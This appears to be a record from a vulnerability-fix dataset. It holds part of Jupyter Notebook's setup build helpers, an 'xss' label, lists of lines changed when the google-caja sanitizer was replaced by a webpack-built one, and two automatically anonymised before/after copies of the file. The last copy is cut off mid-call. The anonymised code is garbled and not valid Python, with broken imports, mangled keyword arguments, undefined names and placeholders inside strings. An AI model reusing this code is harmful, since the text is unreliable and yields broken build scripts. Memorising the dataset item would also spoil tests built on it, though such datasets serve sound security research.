        target_mtime = mtime(target)
        for source in self.sources(name):
            if mtime(source) > target_mtime:
                print(source, target)
                return True
        return False
    def build_main(self, name):
        """Build main.min.js"""
        target = pjoin(static, name, 'js', 'main.min.js')
        if not self.should_run(name, target):
            log.info("%s up to date" % target)
            return
        log.info("Rebuilding %s" % target)
        run(['node', 'tools/build-main.js', name])
    def build_jstranslation(self, trd):
        """Convert one locale's nbjs.po catalog to nbjs.json (*trd* ends in e.g. 'fr_FR')."""
        lang = trd[-5:]
        run([
            pjoin('node_modules', '.bin', 'po2json'),
            '-p', '-F',
            '-f', 'jed1.x',
            '-d', 'nbjs',
            pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.po'),
            pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.json'),
        ])
    def run(self):
        """Build all app bundles and JS translation files, in parallel."""
        self.run_command('jsdeps')
        # NOTE(review): env/PATH is prepared here but never passed to the
        # child processes spawned below — confirm whether that is intended.
        env = os.environ.copy()
        env['PATH'] = npm_path
        # Each task shells out to node, so a thread pool parallelizes the waits.
        pool = ThreadPool()
        pool.map(self.build_main, self.apps)
        pool.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
        # update package data in case this created new files
        update_package_data(self.distribution)
class JavascriptVersion(Command):
    """write the javascript version to notebook javascript"""
    description = "Write Jupyter version to javascript"
    user_options = []

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    @staticmethod
    def _patched_lines(lines, new_version):
        """Return ``(patched, found)``: a copy of *lines* with the
        ``Jupyter.version`` assignment replaced by *new_version*, and a
        flag telling whether the assignment line was seen at all."""
        found = False
        patched = []
        for line in lines:
            if line.strip().startswith("Jupyter.version"):
                line = ' Jupyter.version = "{0}";\n'.format(new_version)
                found = True
            patched.append(line)
        return patched, found

    def run(self):
        nsfile = pjoin(repo_root, "notebook", "static", "base", "js", "namespace.js")
        with open(nsfile) as f:
            lines = f.readlines()
        patched, found = self._patched_lines(lines, version)
        if not found:
            # Fail *before* opening the file for writing: the original code
            # truncated and rewrote namespace.js even when the marker line
            # was missing, and a mid-write failure could leave it corrupted.
            raise RuntimeError("Didn't find Jupyter.version line in %s" % nsfile)
        with open(nsfile, 'w') as f:
            f.writelines(patched)
def css_js_prerelease(command, strict=False):
    """decorator for building minified js/css prior to another command

    Wraps *command* so that the 'jsversion', 'js', 'css' and
    'backendtranslations' sub-commands run first.  With ``strict=True``
    (or when any build target is missing) a build failure aborts the
    wrapped command; otherwise failures are logged and ignored.
    """
    class DecoratedCommand(command):
        def run(self):
            self.distribution.run_command('jsversion')
            jsdeps = self.distribution.get_command_obj('jsdeps')
            js = self.distribution.get_command_obj('js')
            css = self.distribution.get_command_obj('css')
            # In strict mode, force the js/bower builds to rerun.
            jsdeps.force = js.force = strict
            # Every file the build is expected to produce.
            targets = [ jsdeps.bower_dir ]
            targets.extend(js.targets)
            targets.extend(css.targets)
            missing = [ t for t in targets if not os.path.exists(t) ]
            if not is_repo and not missing:
                # If we're an sdist, we aren't a repo and everything should be present.
                # Don't rebuild js/css in that case.
                command.run(self)
                return
            try:
                self.distribution.run_command('js')
                self.distribution.run_command('css')
                self.distribution.run_command('backendtranslations')
            except Exception as e:
                # refresh missing
                missing = [ t for t in targets if not os.path.exists(t) ]
                if strict or missing:
                    # die if strict or any targets didn't build
                    # (report paths relative to the repo root for readability)
                    prefix = os.path.commonprefix([repo_root + os.sep] + missing)
                    missing = [ m[len(prefix):] for m in missing ]
                    log.warn("rebuilding js and css failed. The following required files are missing: %s" % missing)
                    raise e
                else:
                    # Non-strict and nothing missing: treat the failure as benign.
                    log.warn("rebuilding js and css failed (not a problem)")
                    log.warn(str(e))
            # check again for missing targets, just in case:
            missing = [ t for t in targets if not os.path.exists(t) ]
            if missing:
                # command succeeded, but targets still missing (?!)
                prefix = os.path.commonprefix([repo_root + os.sep] + missing)
                missing = [ m[len(prefix):] for m in missing ]
                raise ValueError("The following required files are missing: %s" % missing)
            command.run(self)
    return DecoratedCommand
| xss | {
"code": [
" pjoin(components, \"google-caja\", \"html-css-sanitizer-minified.js\"),",
" return mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))"
],
"line_no": [
140,
384
]
} | {
"code": [
" pjoin(components, \"sanitizer\", \"index.js\"),",
" if not os.path.exists(self.sanitizer_dir):",
" bower_stale = mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))",
" if bower_stale:",
" return True",
" return mtime(self.sanitizer_dir) < mtime(pjoin(repo_root, 'webpack.config.js'))",
" run(['npm', 'run', 'build:webpack'], cwd=repo_root, env=env)"
],
"line_no": [
153,
384,
387,
388,
389,
391,
426
]
} |
import os
import re
import pipes
import .shutil
import .sys
from distutils import log
from distutils.cmd import Command
from fnmatch import .fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import .list2cmdline
else:
def FUNC_10(VAR_19):
return ' '.join(map(pipes.quote, VAR_19))
VAR_0 = os.path.isfile
VAR_1 = os.path.join
VAR_2 = os.path.dirname(os.path.abspath(__file__))
VAR_3 = os.path.isdir(VAR_1(VAR_2, '.git'))
def FUNC_0(VAR_4):
print(">", VAR_4)
os.system(VAR_4)
try:
FUNC_18
except NameError:
def FUNC_18(VAR_41, VAR_42, VAR_43=None):
VAR_43 = locs or VAR_42
exec(compile(open(VAR_41).read(), VAR_41, "exec"), VAR_42, VAR_43)
VAR_5 = 'notebook'
VAR_6 = {}
FUNC_18(VAR_1(VAR_2, VAR_5, '_version.py'), VAR_6)
VAR_7 = VAR_6['__version__']
VAR_8 = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not VAR_8.match(VAR_7):
raise ValueError('Invalid VAR_7 number `%VAR_4`, please follow pep440 convention or pip will get confused about FUNC_19 VAR_44 is more recent.' % VAR_7)
def FUNC_1():
VAR_20 = []
for dir,subdirs,VAR_65 in os.walk(VAR_5):
VAR_44 = dir.replace(os.path.sep, '.')
if '__init__.py' not in VAR_65:
continue
VAR_20.append(VAR_44)
return VAR_20
def FUNC_2():
VAR_21 = [
VAR_1('static', 'components'),
VAR_1('static', '*', 'less'),
VAR_1('static', '*', 'node_modules')
]
VAR_22 = os.getcwd()
os.chdir('notebook')
VAR_23 = []
for parent, VAR_54, VAR_65 in os.walk('static'):
if any(fnmatch(parent, pat) for pat in VAR_21):
VAR_54[:] = []
continue
for f in VAR_65:
VAR_23.append(VAR_1(parent, f))
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
VAR_23.append(VAR_1('static', app, 'js', 'main.min.js'))
VAR_24 = VAR_1("static", "components")
VAR_23.extend([
VAR_1(VAR_24, "backbone", "backbone-min.js"),
VAR_1(VAR_24, "bootstrap", "dist", "js", "bootstrap.min.js"),
VAR_1(VAR_24, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
VAR_1(VAR_24, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
VAR_1(VAR_24, "create-react-class", "index.js"),
VAR_1(VAR_24, "font-awesome", "css", "*.css"),
VAR_1(VAR_24, "es6-promise", "*.js"),
VAR_1(VAR_24, "font-awesome", "fonts", "*.*"),
VAR_1(VAR_24, "google-caja", "html-VAR_62-sanitizer-minified.js"),
VAR_1(VAR_24, "jed", "jed.js"),
VAR_1(VAR_24, "jquery", "jquery.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
VAR_1(VAR_24, "jquery-ui", "jquery-ui.min.js"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "images", "*"),
VAR_1(VAR_24, "marked", "lib", "marked.js"),
VAR_1(VAR_24, "react", "react.production.min.js"),
VAR_1(VAR_24, "react", "react-dom.production.min.js"),
VAR_1(VAR_24, "requirejs", "require.js"),
VAR_1(VAR_24, "requirejs-plugins", "src", "json.js"),
VAR_1(VAR_24, "requirejs-text", "text.js"),
VAR_1(VAR_24, "underscore", "underscore-min.js"),
VAR_1(VAR_24, "moment", "moment.js"),
VAR_1(VAR_24, "moment", "min", "*.js"),
VAR_1(VAR_24, "xterm.js", "index.js"),
VAR_1(VAR_24, "xterm.js-css", "index.css"),
VAR_1(VAR_24, "xterm.js-fit", "index.js"),
VAR_1(VAR_24, "text-encoding", "lib", "encoding.js"),
])
for parent, VAR_54, VAR_65 in os.walk(VAR_1(VAR_24, 'codemirror')):
for f in VAR_65:
if f.endswith(('.js', '.css')):
VAR_23.append(VAR_1(parent, f))
VAR_25 = lambda *VAR_14: VAR_1(VAR_24, 'MathJax', *VAR_14)
VAR_23.extend([
VAR_25('MathJax.js'),
VAR_25('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
VAR_25('config', 'Safe.js'),
])
VAR_26 = []
VAR_27 = VAR_25('jax', 'output')
if os.path.exists(VAR_27):
for output in os.listdir(VAR_27):
VAR_14 = VAR_1(VAR_27, output)
VAR_23.append(VAR_1(VAR_14, '*.js'))
VAR_55 = VAR_1(VAR_14, 'autoload')
if os.path.isdir(VAR_55):
VAR_26.append(VAR_55)
for tree in VAR_26 + [
VAR_25('localization'), # limit to en?
VAR_25('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
VAR_25('extensions'),
VAR_25('jax', 'input', 'TeX'),
VAR_25('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
VAR_25('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
VAR_25('jax', 'element', 'mml'),
]:
for parent, VAR_54, VAR_65 in os.walk(tree):
for f in VAR_65:
VAR_23.append(VAR_1(parent, f))
os.chdir(os.path.join('tests',))
VAR_28 = glob('*.js') + glob('*/*.js')
os.chdir(VAR_22)
VAR_9 = {
'notebook' : ['templates/*'] + VAR_23,
'notebook.tests' : VAR_28,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return VAR_9
def FUNC_3(VAR_9):
print("checking VAR_44 data")
for pkg, data in VAR_9.items():
VAR_45 = VAR_1(*pkg.split('.'))
for d in data:
VAR_14 = VAR_1(VAR_45, d)
if '*' in VAR_14:
assert len(glob(VAR_14)) > 0, "No VAR_65 match pattern %s" % VAR_14
else:
assert os.path.exists(VAR_14), "Missing VAR_44 data: %s" % VAR_14
def FUNC_4(VAR_10):
class CLASS_5(VAR_10):
def FUNC_7(self):
FUNC_3(self.package_data)
VAR_10.run(self)
return CLASS_5
def FUNC_5(VAR_11):
VAR_29 = VAR_11.get_command_obj('build_py')
VAR_11.package_data = FUNC_2()
VAR_29.finalize_options()
try:
from shutil import .which
except ImportError:
def FUNC_19(VAR_15, VAR_46=os.F_OK | os.X_OK, VAR_14=None):
def FUNC_20(VAR_56, VAR_46):
return (os.path.exists(VAR_56) and os.access(VAR_56, VAR_46)
and not os.path.isdir(VAR_56))
if os.path.dirname(VAR_15):
if FUNC_20(VAR_15, VAR_46):
return VAR_15
return None
if VAR_14 is None:
VAR_14 = os.environ.get("PATH", os.defpath)
if not VAR_14:
return None
VAR_14 = path.split(os.pathsep)
if sys.platform == "win32":
if not os.curdir in VAR_14:
path.insert(0, os.curdir)
VAR_64 = os.environ.get("PATHEXT", "").split(os.pathsep)
if any(VAR_15.lower().endswith(ext.lower()) for ext in VAR_64):
VAR_65 = [VAR_15]
else:
VAR_65 = [VAR_15 + ext for ext in VAR_64]
else:
VAR_65 = [VAR_15]
VAR_57 = set()
for dir in VAR_14:
VAR_66 = os.path.normcase(dir)
if not VAR_66 in VAR_57:
seen.add(VAR_66)
for thefile in VAR_65:
VAR_5 = os.path.join(dir, thefile)
if FUNC_20(VAR_5, VAR_46):
return VAR_5
return None
VAR_12 = VAR_1(VAR_2, 'notebook', 'static')
VAR_13 = os.pathsep.join([
VAR_1(VAR_2, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def FUNC_6(VAR_14):
return os.stat(VAR_14).st_mtime
def FUNC_7(VAR_15, *VAR_16, **VAR_17):
log.info('> ' + FUNC_10(VAR_15))
VAR_17['shell'] = (sys.platform == 'win32')
return check_call(VAR_15, *VAR_16, **VAR_17)
class CLASS_0(Command):
VAR_30 = "compile the .po VAR_65 into .mo VAR_65, that contain the translations."
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_47 = glob('notebook/i18n/??_??')
for p in VAR_47:
VAR_58 = p[-5:]
for component in ['notebook', 'nbui']:
FUNC_7(['pybabel', 'compile',
'-D', component,
'-f',
'-l', VAR_58,
'-i', VAR_1('notebook', 'i18n', VAR_58, 'LC_MESSAGES', component+'.po'),
'-o', VAR_1('notebook', 'i18n', VAR_58, 'LC_MESSAGES', component+'.mo')
])
class CLASS_1(Command):
VAR_30 = "fetch VAR_12 client-side VAR_24 with bower"
VAR_31 = [
('force', 'f', "force fetching of bower dependencies"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_32 = VAR_1(VAR_12, 'components')
VAR_33 = VAR_1(VAR_2, 'node_modules')
def FUNC_13(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
return FUNC_6(self.bower_dir) < FUNC_6(VAR_1(VAR_2, 'bower.json'))
def FUNC_14(self):
if not FUNC_19('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return FUNC_6(self.node_modules) < FUNC_6(VAR_1(VAR_2, 'package.json'))
def FUNC_7(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
FUNC_7(['npm', 'install'], VAR_22=VAR_2)
os.utime(self.node_modules, None)
VAR_48 = os.environ.copy()
VAR_48['PATH'] = VAR_13
try:
FUNC_7(
['bower', 'install', '--allow-root', '--config.interactive=false'],
VAR_22=VAR_2,
VAR_48=env
)
except OSError as e:
print("Failed to FUNC_7 bower: %s" % e, file=sys.stderr)
print("You can install VAR_61 dependencies with `npm install`", file=sys.stderr)
raise
os.utime(self.bower_dir, None)
FUNC_5(self.distribution)
def FUNC_8():
VAR_34 = VAR_1(VAR_12, 'components', 'bootstrap', 'less', 'print.less')
with open(VAR_34) as f:
VAR_49 = f.readlines()
for ix, VAR_68 in enumerate(VAR_49):
if 'Black prints faster' in VAR_68:
break
else:
return # Already patched out, nothing to do.
VAR_35 = VAR_49.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", VAR_35)
print()
with open(VAR_34, 'w') as f:
f.writelines(VAR_49)
class CLASS_2(Command):
VAR_30 = "Recompile Notebook CSS"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
VAR_36 = []
VAR_37 = []
for VAR_5 in ('ipython', 'style'):
VAR_36.append(VAR_1(VAR_12, 'style', '%VAR_4.less' % VAR_5))
VAR_37.append(VAR_1(VAR_12, 'style', '%VAR_4.min.css' % VAR_5))
def FUNC_7(self):
self.run_command('jsdeps')
VAR_48 = os.environ.copy()
VAR_48['PATH'] = VAR_13
FUNC_8()
for src, dst in zip(self.sources, self.targets):
try:
FUNC_7(['lessc',
'--source-map',
'--include-VAR_14=%s' % pipes.quote(VAR_12),
src,
dst,
], VAR_22=VAR_2, VAR_48=env)
except OSError as e:
print("Failed to build VAR_62: %s" % e, file=sys.stderr)
print("You can install VAR_61 dependencies with `npm install`", file=sys.stderr)
raise
FUNC_5(self.distribution)
class CLASS_3(Command):
VAR_30 = "Rebuild Notebook Javascript main.min.js files"
VAR_31 = [
('force', 'f', "force rebuilding VAR_61 targets"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_38 = ['notebook', 'tree', 'edit', 'terminal', 'auth']
VAR_37 = [ VAR_1(VAR_12, app, 'js', 'main.min.js') for app in VAR_38 ]
def VAR_36(self, VAR_5):
yield VAR_1(VAR_2, 'tools', 'build-main.js')
yield VAR_1(VAR_12, VAR_5, 'js', 'main.js')
for sec in [VAR_5, 'base', 'auth']:
for f in glob(VAR_1(VAR_12, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield VAR_1(VAR_12, 'services', 'config.js')
if VAR_5 == 'notebook':
for f in glob(VAR_1(VAR_12, 'services', '*', '*.js')):
yield f
for parent, VAR_54, VAR_65 in os.walk(VAR_1(VAR_12, 'components')):
if os.path.basename(parent) == 'MathJax':
VAR_54[:] = []
continue
for f in VAR_65:
yield VAR_1(parent, f)
def FUNC_13(self, VAR_5, VAR_39):
if self.force or not os.path.exists(VAR_39):
return True
VAR_50 = FUNC_6(VAR_39)
for source in self.sources(VAR_5):
if FUNC_6(source) > VAR_50:
print(source, VAR_39)
return True
return False
def FUNC_16(self, VAR_5):
VAR_39 = VAR_1(VAR_12, VAR_5, 'js', 'main.min.js')
if not self.should_run(VAR_5, VAR_39):
log.info("%VAR_4 up to date" % VAR_39)
return
log.info("Rebuilding %s" % VAR_39)
FUNC_7(['node', 'tools/build-main.js', VAR_5])
def FUNC_17(self, VAR_40):
VAR_51 = VAR_40[-5:]
FUNC_7([
VAR_1('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
VAR_1('notebook', 'i18n', VAR_51, 'LC_MESSAGES', 'nbjs.po'),
VAR_1('notebook', 'i18n', VAR_51, 'LC_MESSAGES', 'nbjs.json'),
])
def FUNC_7(self):
self.run_command('jsdeps')
VAR_48 = os.environ.copy()
VAR_48['PATH'] = VAR_13
VAR_52 = ThreadPool()
VAR_52.map(self.build_main, self.apps)
VAR_52.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
FUNC_5(self.distribution)
class CLASS_4(Command):
VAR_30 = "Write Jupyter VAR_7 to javascript"
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_53 = VAR_1(VAR_2, "notebook", "static", "base", "js", "namespace.js")
with open(VAR_53) as f:
VAR_49 = f.readlines()
with open(VAR_53, 'w') as f:
VAR_59 = False
for VAR_68 in VAR_49:
if VAR_68.strip().startswith("Jupyter.version"):
VAR_68 = ' Jupyter.version = "{0}";\n'.format(VAR_7)
VAR_59 = True
f.write(VAR_68)
if not VAR_59:
raise RuntimeError("Didn't find Jupyter.version VAR_68 in %s" % VAR_53)
def FUNC_9(VAR_10, VAR_18=False):
class CLASS_5(VAR_10):
def FUNC_7(self):
self.distribution.run_command('jsversion')
VAR_60 = self.distribution.get_command_obj('jsdeps')
VAR_61 = self.distribution.get_command_obj('js')
VAR_62 = self.distribution.get_command_obj('css')
VAR_60.force = VAR_61.force = VAR_18
VAR_37 = [ VAR_60.bower_dir ]
VAR_37.extend(VAR_61.targets)
VAR_37.extend(VAR_62.targets)
VAR_63 = [ t for t in VAR_37 if not os.path.exists(t) ]
if not VAR_3 and not VAR_63:
VAR_10.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
VAR_63 = [ t for t in VAR_37 if not os.path.exists(t) ]
if VAR_18 or VAR_63:
VAR_67 = os.path.commonprefix([VAR_2 + os.sep] + VAR_63)
VAR_63 = [ m[len(VAR_67):] for m in VAR_63 ]
log.warn("rebuilding VAR_61 and VAR_62 failed. The following required VAR_65 are VAR_63: %s" % VAR_63)
raise e
else:
log.warn("rebuilding VAR_61 and VAR_62 failed (not a problem)")
log.warn(str(e))
VAR_63 = [ t for t in VAR_37 if not os.path.exists(t) ]
if VAR_63:
VAR_67 = os.path.commonprefix([VAR_2 + os.sep] + VAR_63)
VAR_63 = [ m[len(VAR_67):] for m in VAR_63 ]
raise ValueError("The following required VAR_65 are VAR_63: %s" % VAR_63)
VAR_10.run(self)
return CLASS_5
|
import os
import re
import pipes
import .shutil
import .sys
from distutils import log
from distutils.cmd import Command
from fnmatch import .fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import .list2cmdline
else:
def FUNC_10(VAR_19):
return ' '.join(map(pipes.quote, VAR_19))
VAR_0 = os.path.isfile
VAR_1 = os.path.join
VAR_2 = os.path.dirname(os.path.abspath(__file__))
VAR_3 = os.path.isdir(VAR_1(VAR_2, '.git'))
def FUNC_0(VAR_4):
print(">", VAR_4)
os.system(VAR_4)
try:
FUNC_18
except NameError:
def FUNC_18(VAR_42, VAR_43, VAR_44=None):
VAR_44 = locs or VAR_43
exec(compile(open(VAR_42).read(), VAR_42, "exec"), VAR_43, VAR_44)
VAR_5 = 'notebook'
VAR_6 = {}
FUNC_18(VAR_1(VAR_2, VAR_5, '_version.py'), VAR_6)
VAR_7 = VAR_6['__version__']
VAR_8 = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not VAR_8.match(VAR_7):
raise ValueError('Invalid VAR_7 number `%VAR_4`, please follow pep440 convention or pip will get confused about FUNC_19 VAR_45 is more recent.' % VAR_7)
def FUNC_1():
VAR_20 = []
for dir,subdirs,VAR_67 in os.walk(VAR_5):
VAR_45 = dir.replace(os.path.sep, '.')
if '__init__.py' not in VAR_67:
continue
VAR_20.append(VAR_45)
return VAR_20
def FUNC_2():
VAR_21 = [
VAR_1('static', 'components'),
VAR_1('static', '*', 'less'),
VAR_1('static', '*', 'node_modules')
]
VAR_22 = os.getcwd()
os.chdir('notebook')
VAR_23 = []
for parent, VAR_56, VAR_67 in os.walk('static'):
if any(fnmatch(parent, pat) for pat in VAR_21):
VAR_56[:] = []
continue
for f in VAR_67:
VAR_23.append(VAR_1(parent, f))
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
VAR_23.append(VAR_1('static', app, 'js', 'main.min.js'))
VAR_24 = VAR_1("static", "components")
VAR_23.extend([
VAR_1(VAR_24, "backbone", "backbone-min.js"),
VAR_1(VAR_24, "bootstrap", "dist", "js", "bootstrap.min.js"),
VAR_1(VAR_24, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
VAR_1(VAR_24, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
VAR_1(VAR_24, "create-react-class", "index.js"),
VAR_1(VAR_24, "font-awesome", "css", "*.css"),
VAR_1(VAR_24, "es6-promise", "*.js"),
VAR_1(VAR_24, "font-awesome", "fonts", "*.*"),
VAR_1(VAR_24, "jed", "jed.js"),
VAR_1(VAR_24, "jquery", "jquery.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
VAR_1(VAR_24, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
VAR_1(VAR_24, "jquery-ui", "jquery-ui.min.js"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
VAR_1(VAR_24, "jquery-ui", "themes", "smoothness", "images", "*"),
VAR_1(VAR_24, "marked", "lib", "marked.js"),
VAR_1(VAR_24, "react", "react.production.min.js"),
VAR_1(VAR_24, "react", "react-dom.production.min.js"),
VAR_1(VAR_24, "requirejs", "require.js"),
VAR_1(VAR_24, "requirejs-plugins", "src", "json.js"),
VAR_1(VAR_24, "requirejs-text", "text.js"),
VAR_1(VAR_24, "sanitizer", "index.js"),
VAR_1(VAR_24, "underscore", "underscore-min.js"),
VAR_1(VAR_24, "moment", "moment.js"),
VAR_1(VAR_24, "moment", "min", "*.js"),
VAR_1(VAR_24, "xterm.js", "index.js"),
VAR_1(VAR_24, "xterm.js-css", "index.css"),
VAR_1(VAR_24, "xterm.js-fit", "index.js"),
VAR_1(VAR_24, "text-encoding", "lib", "encoding.js"),
])
for parent, VAR_56, VAR_67 in os.walk(VAR_1(VAR_24, 'codemirror')):
for f in VAR_67:
if f.endswith(('.js', '.css')):
VAR_23.append(VAR_1(parent, f))
VAR_25 = lambda *VAR_14: VAR_1(VAR_24, 'MathJax', *VAR_14)
VAR_23.extend([
VAR_25('MathJax.js'),
VAR_25('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
VAR_25('config', 'Safe.js'),
])
VAR_26 = []
VAR_27 = VAR_25('jax', 'output')
if os.path.exists(VAR_27):
for output in os.listdir(VAR_27):
VAR_14 = VAR_1(VAR_27, output)
VAR_23.append(VAR_1(VAR_14, '*.js'))
VAR_57 = VAR_1(VAR_14, 'autoload')
if os.path.isdir(VAR_57):
VAR_26.append(VAR_57)
for tree in VAR_26 + [
VAR_25('localization'), # limit to en?
VAR_25('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
VAR_25('extensions'),
VAR_25('jax', 'input', 'TeX'),
VAR_25('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
VAR_25('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
VAR_25('jax', 'element', 'mml'),
]:
for parent, VAR_56, VAR_67 in os.walk(tree):
for f in VAR_67:
VAR_23.append(VAR_1(parent, f))
os.chdir(os.path.join('tests',))
VAR_28 = glob('*.js') + glob('*/*.js')
os.chdir(VAR_22)
VAR_9 = {
'notebook' : ['templates/*'] + VAR_23,
'notebook.tests' : VAR_28,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return VAR_9
def FUNC_3(VAR_9):
print("checking VAR_45 data")
for pkg, data in VAR_9.items():
VAR_46 = VAR_1(*pkg.split('.'))
for d in data:
VAR_14 = VAR_1(VAR_46, d)
if '*' in VAR_14:
assert len(glob(VAR_14)) > 0, "No VAR_67 match pattern %s" % VAR_14
else:
assert os.path.exists(VAR_14), "Missing VAR_45 data: %s" % VAR_14
def FUNC_4(VAR_10):
class CLASS_5(VAR_10):
def FUNC_7(self):
FUNC_3(self.package_data)
VAR_10.run(self)
return CLASS_5
def FUNC_5(VAR_11):
VAR_29 = VAR_11.get_command_obj('build_py')
VAR_11.package_data = FUNC_2()
VAR_29.finalize_options()
try:
from shutil import .which
except ImportError:
def FUNC_19(VAR_15, VAR_47=os.F_OK | os.X_OK, VAR_14=None):
def FUNC_20(VAR_58, VAR_47):
return (os.path.exists(VAR_58) and os.access(VAR_58, VAR_47)
and not os.path.isdir(VAR_58))
if os.path.dirname(VAR_15):
if FUNC_20(VAR_15, VAR_47):
return VAR_15
return None
if VAR_14 is None:
VAR_14 = os.environ.get("PATH", os.defpath)
if not VAR_14:
return None
VAR_14 = path.split(os.pathsep)
if sys.platform == "win32":
if not os.curdir in VAR_14:
path.insert(0, os.curdir)
VAR_66 = os.environ.get("PATHEXT", "").split(os.pathsep)
if any(VAR_15.lower().endswith(ext.lower()) for ext in VAR_66):
VAR_67 = [VAR_15]
else:
VAR_67 = [VAR_15 + ext for ext in VAR_66]
else:
VAR_67 = [VAR_15]
VAR_59 = set()
for dir in VAR_14:
VAR_68 = os.path.normcase(dir)
if not VAR_68 in VAR_59:
seen.add(VAR_68)
for thefile in VAR_67:
VAR_5 = os.path.join(dir, thefile)
if FUNC_20(VAR_5, VAR_47):
return VAR_5
return None
VAR_12 = VAR_1(VAR_2, 'notebook', 'static')
VAR_13 = os.pathsep.join([
VAR_1(VAR_2, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def FUNC_6(VAR_14):
return os.stat(VAR_14).st_mtime
def FUNC_7(VAR_15, *VAR_16, **VAR_17):
log.info('> ' + FUNC_10(VAR_15))
VAR_17['shell'] = (sys.platform == 'win32')
return check_call(VAR_15, *VAR_16, **VAR_17)
class CLASS_0(Command):
VAR_30 = "compile the .po VAR_67 into .mo VAR_67, that contain the translations."
VAR_31 = []
def FUNC_11(self):
pass
def FUNC_12(self):
pass
def FUNC_7(self):
VAR_48 = glob('notebook/i18n/??_??')
for p in VAR_48:
VAR_60 = p[-5:]
for component in ['notebook', 'nbui']:
FUNC_7(['pybabel', 'compile',
'-D', component,
'-f',
'-l', VAR_60,
'-i', VAR_1('notebook', 'i18n', VAR_60, 'LC_MESSAGES', component+'.po'),
'-o', VAR_1('notebook', 'i18n', VAR_60, 'LC_MESSAGES', component+'.mo')
])
class CLASS_1(Command):
VAR_30 = "fetch VAR_12 client-side VAR_24 with bower"
VAR_31 = [
('force', 'f', "force fetching of bower dependencies"),
]
def FUNC_11(self):
self.force = False
def FUNC_12(self):
self.force = bool(self.force)
VAR_32 = VAR_1(VAR_12, 'components')
VAR_33 = VAR_1(VAR_2, 'node_modules')
VAR_34 = VAR_1(VAR_32, 'sanitizer')
def FUNC_13(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
if not os.path.exists(self.sanitizer_dir):
return True
VAR_49 = FUNC_6(self.bower_dir) < FUNC_6(VAR_1(VAR_2, 'bower.json'))
if VAR_49:
return True
return FUNC_6(self.sanitizer_dir) < FUNC_6(VAR_1(VAR_2, 'webpack.config.js'))
def FUNC_14(self):
if not FUNC_19('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return FUNC_6(self.node_modules) < FUNC_6(VAR_1(VAR_2, 'package.json'))
def FUNC_7(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
FUNC_7(['npm', 'install'], VAR_22=VAR_2)
os.utime(self.node_modules, None)
VAR_50 = os.environ.copy()
VAR_50['PATH'] = VAR_13
try:
FUNC_7(
['bower', 'install', '--allow-root', '--config.interactive=false'],
